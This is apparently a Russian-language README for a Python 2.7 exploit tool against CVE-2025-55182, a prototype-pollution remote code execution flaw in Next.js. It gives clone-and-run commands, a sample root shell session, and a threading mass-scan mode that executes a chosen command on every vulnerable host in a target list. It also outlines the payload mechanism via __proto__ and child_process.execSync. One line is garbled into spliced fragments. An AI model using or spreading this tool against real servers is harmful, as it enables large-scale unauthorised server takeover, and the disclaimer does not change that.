
CVE-2025-55182 Эксплойт-инструмент – эксплойт на Python 2.7 для загрязнения прототипа Next.js, приводящего к RCE
Эксплойт на Python 2.7 для CVE-2025-55182 – критической уязвимости прототипного загрязнения / удаленного выполнения кода в приложениях Next.js.
Этот инструмент позволяет как интерактивную оболочку для одной цели, так и массовое сканирование нескольких хостов с многопоточностью, цветным выводом и автоматическим переключением на HTTPS.
https://, если протокол не указанid на любую (whoami, ls и т.д.)requests (легко устанавливается)requests – установка:
pip install requests
· Терминал, поддерживающий ANSI-цвета (большинство терминалов Linux/macOS, Windows Terminal, PowerShell)
git clone https://github.com/Jenderal92/cve-2025-55182.git
cd CVE-2025-55182
pip install requests
Сделайте скрипт исполняемым (опционально):
chmod +x CVE-2025-55182.py
python2 CVE-2025-55182.py https://target.com
или без протокола (HTTPS добавляется автоматически):
python2 CVE-2025-55182.py target.com
После подключения и подтверждения уязвимости вы получаете приглашение оболочки:
$ id
uid=0(root) gid=0(root) groups=0(root)
$ whoami
root
$ ls -la
...
Встроенные команды:
· exit / quit – закрыть оболочку
· clear – очистить экран
· help – показать справку
Подготовьте файл с одной целью в строке (с http/https или без):
targets.txt
app-site3.htface.tech
https://example.com
http://127.0.0.1:3000
vulnerable-site.org
Запустите массовое сканирование (по умолчанию: 10 потоков, команда id, вывод res.txt):
python2 CVE-2025-55182.py targets.txt
Настройте потоки, команду, файл вывода:
python2 CVE-2025-55182.py targets.txt 20 "whoami" results.txt
· 20 – количество потоков
· whoami – команда для выполнения на каждой уязвимой цели
· results.txt – выходной файл (сохраняются только уязвимые записи)
Пример вывода массового сканирования:
[INFO] Loaded 4 URLs
[INFO] Threads: 10, Command: 'id', Output: res.txt
[*] (1/4) Checking: https://site.com
[+] VULNERABLE: https://site.com
Status: 303
Output: uid=0(root) gid=0(root) groups=0(root)
[-] NOT VULNERABLE: https://example.com
...
Сохраненные результаты (res.txt):
domain : https://site.com
cmd : uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------
Эксплойт отправляет специально сформированный multipart/form-data запрос к конечной точке Next.js (/login добавляется, если путь пуст).
Он использует загрязнение прототипов (__proto__:then и constructor:constructor) для внедрения вредоносного префикса, который выполняет системную команду с помощью child_process.execSync().
Сервер отвечает перенаправлением 303, содержащим вывод команды в заголовке x-action-redirect (или Location). Инструмент извлекает результат из /login?a=<output>.
Этот инструмент предназначен только для образовательных целей и авторизованного тестирования безопасности.
Несанкционированный доступ к компьютерным системам незаконен. Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим программным обеспечением.
Вы должны иметь явное письменное разрешение от владельца целевой системы перед использованием этого эксплойта.
Более подробный отказ от ответственности вы можете увидеть на обложке Jenderal92. Вы можете проверить его ЗДЕСЬ !!!